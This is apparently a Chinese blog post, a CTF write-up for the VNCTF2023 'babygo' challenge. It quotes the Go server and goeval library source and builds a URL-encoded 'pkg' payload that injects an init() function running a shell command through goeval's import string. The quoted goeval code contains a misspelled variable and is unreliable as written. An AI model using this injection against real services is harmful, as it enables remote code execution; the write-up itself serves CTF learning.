VNCTF2023 babygo backdoor部分payload详解

已于 2023-03-03 17:54:08 修改
阅读量324 收藏
点赞数
分类专栏: CTF 文章标签: 开发语言 golang
于 2023-02-26 21:22:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73606240/article/details/129229077
版权

        看了几个人的vnctf2023的web复现,我觉得部分人可能会觉得backdoor部分的payload有点难理解,这里帮他们补充一下,先上源码

package main

import (
	"encoding/gob"
	"fmt"
	"github.com/PaulXu-cn/goeval"
	"github.com/duke-git/lancet/cryptor"
	"github.com/duke-git/lancet/fileutil"
	"github.com/duke-git/lancet/random"
	"github.com/gin-contrib/sessions"
	"github.com/gin-contrib/sessions/cookie"
	"github.com/gin-gonic/gin"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

type User struct {
	Name  string
	Path  string
	Power string
}

func main() {
	r := gin.Default()
	store := cookie.NewStore(random.RandBytes(16))
	r.Use(sessions.Sessions("session", store))
	r.LoadHTMLGlob("template/*")

	r.GET("/", func(c *gin.Context) {
		userDir := "/tmp/" + cryptor.Md5String(c.ClientIP()+"VNCTF2023GoGoGo~") + "/"
		session := sessions.Default(c)
		session.Set("shallow", userDir)
		session.Save()
		fileutil.CreateDir(userDir)
		gobFile, _ := os.Create(userDir + "user.gob")
		user := User{Name: "ctfer", Path: userDir, Power: "low"}
		encoder := gob.NewEncoder(gobFile)
		encoder.Encode(user)
		if fileutil.IsExist(userDir) && fileutil.IsExist(userDir+"user.gob") {
			c.HTML(200, "index.html", gin.H{"message": "Your path: " + userDir})
			return
		}
		c.HTML(500, "index.html", gin.H{"message": "failed to make user dir"})
	})

	r.GET("/upload", func(c *gin.Context) {
		c.HTML(200, "upload.html", gin.H{"message": "upload me!"})
	})

	r.POST("/upload", func(c *gin.Context) {
		session := sessions.Default(c)
		if session.Get("shallow") == nil {
			c.Redirect(http.StatusFound, "/")
		}
		userUploadDir := session.Get("shallow").(string) + "uploads/"
		fileutil.CreateDir(userUploadDir)
		file, err := c.FormFile("file")
		if err != nil {
			c.HTML(500, "upload.html", gin.H{"message": "no file upload"})
			return
		}
		ext := file.Filename[strings.LastIndex(file.Filename, "."):]
		if ext == ".gob" || ext == ".go" {
			c.HTML(500, "upload.html", gin.H{"message": "Hacker!"})
			return
		}
		filename := userUploadDir + file.Filename
		if fileutil.IsExist(filename) {
			fileutil.RemoveFile(filename)
		}
		err = c.SaveUploadedFile(file, filename)
		if err != nil {
			c.HTML(500, "upload.html", gin.H{"message": "failed to save file"})
			return
		}
		c.HTML(200, "upload.html", gin.H{"message": "file saved to " + filename})
	})

	r.GET("/unzip", func(c *gin.Context) {
		session := sessions.Default(c)
		if session.Get("shallow") == nil {
			c.Redirect(http.StatusFound, "/")
		}
		userUploadDir := session.Get("shallow").(string) + "uploads/"
		files, _ := fileutil.ListFileNames(userUploadDir)
		destPath := filepath.Clean(userUploadDir + c.Query("path"))
		for _, file := range files {
			if fileutil.MiMeType(userUploadDir+file) == "application/zip" {
				err := fileutil.UnZip(userUploadDir+file, destPath)
				if err != nil {
					c.HTML(200, "zip.html", gin.H{"message": "failed to unzip file"})
					return
				}
				fileutil.RemoveFile(userUploadDir + file)
			}
		}
		c.HTML(200, "zip.html", gin.H{"message": "success unzip"})
	})
	r.GET("/backdoor", func(c *gin.Context) {
		session := sessions.Default(c)
		if session.Get("shallow") == nil {
			c.Redirect(http.StatusFound, "/")
		}
		userDir := session.Get("shallow").(string)
		if fileutil.IsExist(userDir + "user.gob") {
			file, _ := os.Open(userDir + "user.gob")
			decoder := gob.NewDecoder(file)
			var ctfer User
			decoder.Decode(&ctfer)
			if ctfer.Power == "admin" {
				eval, err := goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))//DefaultQuery给请求参数赋默认值
				if err != nil {
					fmt.Println(err)
				}
				c.HTML(200, "backdoor.html", gin.H{"message": string(eval)})
				return
			} else {
				c.HTML(200, "backdoor.html", gin.H{"message": "low power"})
				return
			}
		} else {
			c.HTML(500, "backdoor.html", gin.H{"message": "no such user gob"})
			return
		}
	})

	r.Run(":80")
}

        提权部分就不多说了,主要是针对下面这块代码,拿到admin权限之后就会执行,goeval的eval函数,如果不给query传参的话,就是简单的调用fmt库的printfln函数输出good。这里我们可控的参数就只有pkg,所以想想能不能利用eval函数的来进行命令注入

if ctfer.Power == "admin" {
	    eval, err := goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))
	    if err != nil {
		    fmt.Println(err)
			}

        这里我去github找了一下goeval的源码,贴在下面了

package goeval

import (
	"fmt"
	"go/format"
	"math/rand"
	"os"
	"os/exec"
	"strings"
	"time"
)

const (
	letterBytes = "abcdefghijklmnopqrstuvwxyz"
	letterIdxBits = 6                    // 6 bits to represent a letter index
	letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
	letterIdxMax  = 63 / letterIdxBits   // # of letter indices fitting in 63 bits
)

var (
	dirSeparator = "/"
	tempDir      = os.TempDir()
	src          = rand.NewSource(time.Now().UnixNano())
)

// 参考: https://colobu.com/2018/09/02/generate-random-string-in-Go/
func RandString(n int) string {
	b := make([]byte, n)
	// A src.Int63() generates 63 random bits, enough for letterIdxMax characters!
	for i, cache, remain := n-1, src.Int63(), letterIdxMax; i >= 0; {
		if remain == 0 {
			cache, remain = src.Int63(), letterIdxMax
		}
		if idx := int(cache & letterIdxMask); idx < len(letterBytes) {
			b[i] = letterBytes[idx]
			i--
		}
		cache >>= letterIdxBits
		remain--
	}
	return string(b)
}

func Eval(defineCode string, code string, imports ...string) (re []byte, err error) {
	var (
		tmp = `package main
%s
%s
func main() {
%s
}
`
		importStr string
		fullCode string
	 	newTmpDir = tempDir + dirSeparator + RandString(8)
	)

	if 0 < len(imports) {
		importStr = "import ("
		for _, item := range imports {
			if blankInd := strings.Index(item, " "); -1 < blankInd {
				importStr += fmt.Sprintf("\n %s \"%s\"", item[:blankInd], item[blankInd+1:])
			} else {
				importStr += fmt.Sprintf("\n\"%s\"", item)
			}
		}
		importStr += "\n)"
	}
	fullCode = fmt.Sprintf(tmp, ipomrtStr, defineCode, code)

	var codeBytes = []byte(fullCode)
	// 格式化输出的代码
	if formatCode, err := format.Source(codeBytes); nil == err {
		// 格式化失败,就还是用 content 吧
		codeBytes = formatCode
	}

	// 创建目录
	if err = os.Mkdir(newTmpDir, os.ModePerm); nil != err {
		return
	}
	defer os.RemoveAll(newTmpDir)
	// 创建文件
	tmpFile, err := os.Create(newTmpDir + dirSeparator + "main.go")
	if err != nil {
		return re, err
	}
	defer os.Remove(tmpFile.Name())
	// 代码写入文件
	tmpFile.Write(codeBytes)
	tmpFile.Close()
	// 运行代码
	cmd := exec.Command("go", "run", tmpFile.Name())
	res, err := cmd.CombinedOutput()
	return res, err
}

        因为goeval的源码有注释了,这里不细讲每一部分的作用,主要讲讲下面这个部分,找到我们可控参数pkg的部分,对应eval函数里的imports变量。


    if 0 < len(imports) {
		importStr = "import ("
		for _, item := range imports {
			if blankInd := strings.Index(item, " "); -1 < blankInd {
				importStr += fmt.Sprintf("\n %s \"%s\"", item[:blankInd], item[blankInd+1:])
			} else {
				importStr += fmt.Sprintf("\n\"%s\"", item)
			}
		}
		importStr += "\n)"
	}

        可以看到importStr变量是通过字符串拼接而成的,item会获取imports整个字符串,当index函数检测到" "时,就会以" "为界,分别输出前和后的内容,下图为输入"aaa bbbb cccc"的结果。为了使注入的内容不受引号变化的影响,payload就不使用空格,用\n和\t来防止格式错乱 

        下面再说说go语言中的init()函数,它具有先于main()函数执行的特性,所以可以想到,能否通过将init()函数嵌入importStr中,并让其执行我们需要的命令。仿照源码的运行代码部分,可以先写出下面的代码

        

package main

import (
	"fmt"
	"os/exec"
	)
	
func init(){
	cmd := exec.Command("ls", "/")
	res, err := cmd.CombinedOutput()
	fmt.Println(string(res))
	fmt.Println(err)
}
//定义a闭合\n)
var( a="a

        接下来需要截取我们需要的payload,如下

fmt"
	"os/exec"
	)
	
func init(){
	cmd := exec.Command("ls", "/")
	res, err := cmd.CombinedOutput()
	fmt.Println(string(res))
	fmt.Println(err)
}
var( a="a

        最后还需要进行拼接,由于需要保留payload当中的换行符和空格符(使用制表符替换),%0a和%09分别使网页换行符和制表符的url码,接下来就需要将所有换行和空格符用%0a和%09替换,最后的pkg的payload如下,传参后就出结果啦。

fmt"%0a"os/exec"%0a)%0afunc%09init(){%0acmd:=exec.Command("ls","/")%0ares,err:=cmd.CombinedOutput()%0afmt.Println(string(res))%0afmt.Println(err)%0a}%0avar(%09a="a

 

        还有一些大佬是直接把库函数println魔改了,这里就不赘述了,大家自行了解吧。

参考文章:PaulXu-cn/goeval: Evaluate Golang Code by the Eval Function (github.com)

QMDD
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
VNCTF 2023 - Web 象棋王子|电子木鱼|BabyGo Writeups
M1n9K1n9的博客
02-19 1927
VNCTF 2023 Web 象棋王子|电子木鱼|BabyGo
vnctf2023 traveler
XDiku的博客
02-22 425
vnctf2023
VNCTF 2023 部分wp
sln_1550的博客
02-20 2265
今年逆向题目比较多,还挺顺手的,其他题目还算不难,除了babyAnti这题就AK逆向了。这题用的flutter库,研究了好久也完全找不到思路,只好放弃。后来才知道根据题目的名字,预期解就是去掉反作弊的检查,用作弊方法完成的。
VNCTF2023 WP
qq_74710163的博客
02-25 351
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
2023—VNCTF-re-PZGalaxy
qq_54894802的博客
02-26 244
这里分析一下我们就可以知道,data和enc都传入了Leaf中进行加密,我们就可以推测出data,就是进行加密的密钥。后面的一行代码,分别是判断flag前面四个字符,和data前面的四个字符,并且我们可以知道,data的长度为8.解出flag:flag{HitYourSoulAndSeeYouInTheGalaxy}知道key的前四个字符,也知道key的前四个字符,自然想到对key进行爆破。源码很有特点,就是进行rc4加密。用浏览器打开 开发者工具查看源码。这道题是用js写的代码。
babygo:从头开始制作的Go编译器,可以自行编译。 这将是最小最简单的go编译器
02-05
Babygo,从头开始制作的go编译器 Babygo是一个小型且简单的go编译器。 (我相信,这是世界上最小最简单的。)它是从头开始制作的,可以自行编译。 不依赖任何库。 标准库和系统调用的调用是自制的。 Lexer,解析器和...
宝贝计划在线教育管理系统
08-12
在"babyGo1.1-master"这个文件名中,"master"通常表示这是项目的主分支,意味着这可能是项目的最新稳定版本。项目可能采用Git进行版本控制,通过GitHub或类似的平台进行协作和代码托管。 总的来说,“宝贝计划在线...
VNCTF2023复现
qq_74655174的博客
02-23 548
VNCTF2023复现
VNCTF2023部分wp
weixin_52118017的博客
02-19 543
vnctf2023部分wp
babyGo(安恒2019.1 pop链的构造)
stepone4ward的博客
02-24 2202
周周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。 再看一看这道题目的baby类 也就是说这道题目中的类baby调用了sec类的read()方法。l 但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。 这个时候就要利用最开始提到的...
Payload
03-31
Payload
CTF流量分析经典例题详解
最新发布
qq_68163788的博客
01-03 2385
CTF(Capture The Flag)流量分析是网络安全竞赛中的重要环节,通过分析网络数据包来解决问题。经典例题包括网络流量分析、协议分析、恶意代码分析等。举例来说,一道经典的CTF流量分析题目可能是给定一个pcap文件,要求分析其中的数据包,找出隐藏的信息或者发现异常行为。参赛者需要使用网络分析工具如Wireshark或tcpdump来分析数据包,识别各种协议如HTTP、FTP、DNS等,并根据特定的任务要求提取关键信息。另外,恶意代码分析也是CTF中常见的题型,参赛者需要分析给定的恶意代码样本
后门构建工具Backdoor Factory
weixin_33896069的博客
05-17 311
2019独角兽企业重金招聘Python工程师标准>>> ...
2019安恒一月月赛web1-babygo
0nc3的博客
01-28 1822
web1-babygo 考察知识点: PHP反序列化 POP链构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP链构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考链接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
2019安恒杯一月新春贺岁赛writeup
筱阳的博客
01-27 4234
Simple php http://101.71.29.5:10004/robots.txt http://101.71.29.5:10004/admin ThinkPHP3.2.3 http://101.71.29.5:10004/index.php?username[0]=bind&amp;amp;amp;amp;amp;amp;amp;username[1]=0 and updatexml(1,concat(0x7,user(),0x7...
【病毒】backdoor病毒源代码
ygyangguang的专栏
12-07 579
--=//backdoor.c//=--  /*  A rip off a sockets tutorial i found somewhere cause I didnt feel like  writing stupid basic sockets code when I had it in my src directory  already.  */  /* Greets:  Undern
i春秋 “百度杯”CTF比赛 十月场 Backdoor
include_heqile的博客
09-20 2883
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;amp;r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
2018年金融业ctf竞赛 backdoor 流量数据分析writeup
qq_42773814的博客
08-08 3396
Backdoor   flag:flag{b3c4r3fortheChinaChopperFHGJKUI^U%}   解题过程: 利用wireshark打开文件,过滤http报文,任意选择一个报文右键选择追踪流-&gt;http流 追踪流里面包含大量16进制代码,观察前几位发现它是zip压缩文件的文件头 将z1后面的参数复制下来 以16进制形式粘贴到C32asm工具里 ...
VNCTF-reverse-BabyMaze(复现)
ookami6497的博客
03-20 596
pyc花指令 生成的文件也是0字节,一般至少都能生成点东西出来的,但是这个一点都没有,当时猜估计是有个循环啥的,然后就不会写了 根据wp来复现一下,先查看字节码 import marshal, dis f = open("BabyMaze.pyc", "rb").read() code = marshal.loads(f[16:]) #这边从16位开始取因为是python3 python2从8位开始取 dis.d..
Requirement already satisfied: numpy in e:\babygo\anaconda\lib\site-packages (1.19.5)
06-09
这个说明你的numpy已经是最新版本的1.19.5了,但是这个版本低于pomegranate要求的最低版本1.20.0,因此会产生冲突。 你可以尝试安装pomegranate的旧版本,该版本兼容numpy 1.19.5。例如,以下命令将安装pomegranate...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QMDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值